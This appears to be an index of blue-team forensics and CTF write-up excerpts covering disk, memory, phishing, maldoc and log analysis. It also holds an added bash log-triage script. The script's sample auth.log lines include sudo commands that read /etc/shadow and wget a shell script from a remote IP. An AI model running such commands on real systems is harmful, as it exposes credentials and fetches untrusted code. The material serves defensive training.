https://cyberdefenders.org/labs/66 Contents Introduction Tools Preparation Questions #1: What is the MD5 hash value of the suspect disk? #2: What phrase did the suspect search for on 2021-04-29 18:17:38 UTC? #3: What is the IPv4 address of the FTP server the suspect connected to? #4: What date and time was a password list deleted in UTC? #5: How many times was Tor Browser run on the suspect's computer?
https://blueteamlabs.online/home/challenge/1 Introduction Questions Run “vol.py -f infected.vmem --profile=Win7SP1x86 psscan”, which will list all processes. What is the name of the suspicious process? What is the parent process ID for the suspicious process? What is the initial malicious executable that created this process? If you drill down on the suspicious PID (vol.py -f infected.vmem --profile=Win7SP1x86 psscan | grep (PIDhere)), find the process used to delete files. Find the path where the malicious file was first executed. Can you identify what ransomware it is?
Part of my role involves threat hunting on client servers. During one of these hunts I found a PHP backdoor called shell20210526.php. It was obfuscated - challenge accepted! There are a few PHP deobfuscation tools available. Individually they didn’t get the result, but in combination (along with some manual intervention) I was able to get a good result. Table of Contents Tools The .php Stage 1: UnPHP Stage 2: Manual Editing Stage 3: Run the Function Stage 4: PHP Deobfuscator Base64 Variables HTML Front-end Investigation Comments Tools UnPHP - The Online PHP Decoder
Update The answers have been released and are available here: https://isc.sans.edu/forums/diary/June+2021+Forensic+Contest+Answers+and+Analysis/27582/ They said it was hard, and it was. I’m proud of what I found! Reflecting back: For some reason, I thought they meant not all the machines are infected. It turns out all three were! So I skipped over .93 entirely. Similarly, I was thinking each infected machine only had one piece of malware. Wrong again! Because I was looking for the answers and not thinking as if it was a real investigation, I stopped looking too early.
https://blueteamlabs.online/home/challenge/10 What is the email service used by the malicious actor? What is the Reply-To email address? What is the filetype of the received attachment which helped to continue the investigation? What is the name of the malicious actor? What is the location of the attacker in this Universe? What could be the probable C2 domain to control the attacker’s autonomous bots?
https://cyberdefenders.org/labs/42 Contents Initial Analysis Initial Findings Manipulating the Logs auth.log - sorted by command then time auth.log - all unique lines sorted by command (excluding timestamp) auth.log - extract commands auth.log - extract IPs www-access.log - extract IPs www-access.log - extract user agents Questions #1 Which service did the attackers use to gain access to the system? #2 What is the operating system version of the targeted system?
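The excerpt above lists the log-manipulation steps used in that write-up (sorting auth.log by command, extracting IPs and commands, pulling IPs and user agents out of www-access.log). The following shell helpers are an added example of those steps and are not code from the original post or from the lab; the auth.log and access.log lines embedded in them are constructed for illustration, and the IPs are documentation addresses, not ones from the lab.

```shell
#!/usr/bin/env bash
# Added example: log-triage helpers for auth.log and an Apache-style access log.
# The sample lines below are constructed; they are not from the CyberDefenders lab.

AUTH_LOG=$(cat <<'EOF'
Nov 12 10:01:02 host sshd[1201]: Failed password for root from 203.0.113.7 port 51122 ssh2
Nov 12 10:01:05 host sshd[1203]: Failed password for admin from 203.0.113.7 port 51130 ssh2
Nov 12 10:02:11 host sshd[1210]: Accepted password for admin from 203.0.113.7 port 51201 ssh2
Nov 12 10:03:40 host sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/cat /etc/shadow
Nov 12 10:04:02 host sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/wget http://198.51.100.23/x.sh
EOF
)

ACCESS_LOG=$(cat <<'EOF'
198.51.100.23 - - [12/Nov/2021:10:05:01 +0000] "GET /wp-login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/91.0"
198.51.100.23 - - [12/Nov/2021:10:05:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.25.1"
192.0.2.44 - - [12/Nov/2021:10:06:30 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/91.0"
EOF
)

# Source IPv4 addresses that sshd logged after "from ", counted, most frequent first.
# Only "from <ip>" is matched, so IPs that appear inside commands are not counted here.
auth_ips() {
  printf '%s\n' "$AUTH_LOG" \
    | grep -oE 'from [0-9]+(\.[0-9]+){3}' \
    | cut -d' ' -f2 \
    | sort | uniq -c | sort -rn
}

# Commands run through sudo, with the timestamp and session fields dropped so that
# identical commands collapse to one line (the "unique lines excluding timestamp" step).
auth_commands() {
  printf '%s\n' "$AUTH_LOG" \
    | grep -oE 'COMMAND=.*' \
    | cut -d= -f2- \
    | sort -u
}

# Client IP is the first field of a combined-format access log line.
access_ips() {
  printf '%s\n' "$ACCESS_LOG" \
    | awk '{print $1}' \
    | sort | uniq -c | sort -rn
}

# The user agent is the last double-quoted field; splitting on '"' leaves it as
# field NF-1 (field NF is the empty remainder after the closing quote).
access_user_agents() {
  printf '%s\n' "$ACCESS_LOG" \
    | awk -F'"' '{print $(NF-1)}' \
    | sort | uniq -c | sort -rn
}

# Stand-alone run: print each view in turn.
if [ "${1:-}" = "--run" ]; then
  echo "== auth.log source IPs ==";  auth_ips
  echo "== auth.log sudo commands =="; auth_commands
  echo "== access.log client IPs ==";  access_ips
  echo "== access.log user agents =="; access_user_agents
fi
```

Run it with `--run` to see all four views; on a real case point the `printf` at the log files instead (`cat /var/log/auth.log | ...`). Splitting on the double quote for the user agent is more robust than counting space-separated fields, since user-agent strings contain spaces and the request line itself is quoted.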
https://blueteamlabs.online/home/challenge/7 Open the file Decode the file Deobfuscating the script Spacing Fillers Chars Variables Format Strings Replaces Splits Questions What security protocol is being used for the communication with a malicious domain? What directory does the obfuscated PowerShell create? (Starting from \HOME) What file is being downloaded (full name)? What is used to execute the downloaded file? What is the domain name of the URI ending in ‘/6F2gd/’? Based on the analysis of the obfuscated code, what is the name of the malware?
https://cyberdefenders.org/labs/51 Contents Tools Used 1. Multiple streams contain macros in this document. Provide the number of the highest one. 2. What event is used to begin the execution of the macros? 3. What malware family was this maldoc attempting to drop? 4. What stream is responsible for the storage of the base64-encoded string? 5. This document contains a user-form. Provide the name. 6. This document contains an obfuscated base64 encoded string; what value is used to pad (or obfuscate) this string?
https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz/27266/ Introduction Artifacts Excel-related Executables and DLLs Scheduled Task Pcaps Export objects Traffic Summary SHAs Introduction We’re provided with a .pcap and a bunch of artifacts (files). The AD, we’re told, is as follows: LAN segment range: 192.168.5.0/24 (192.168.5.0 through 192.168.5.255) Domain: clockwater.net Domain Controller: 192.168.5.5 - Clockwater-DC LAN segment gateway: 192.168.5.1 LAN segment broadcast address: 192.168.5.255 Artifacts First, let’s inspect the artifacts.
Splunk have several “Boss of the SOC” datasets, simulating a security incident - think of it as a Blue Team/SIEM-based CTF. This is my write-up for BOTSv3, at the time of writing the most recent dataset available. It seems that Taedonggang, a North Korean group, have attacked Frothly, a beer maker… The official BOTSv3 page is here: https://github.com/splunk/botsv3 I wrote this on Notion, and it is best viewed there, as it is always up-to-date and is visually best.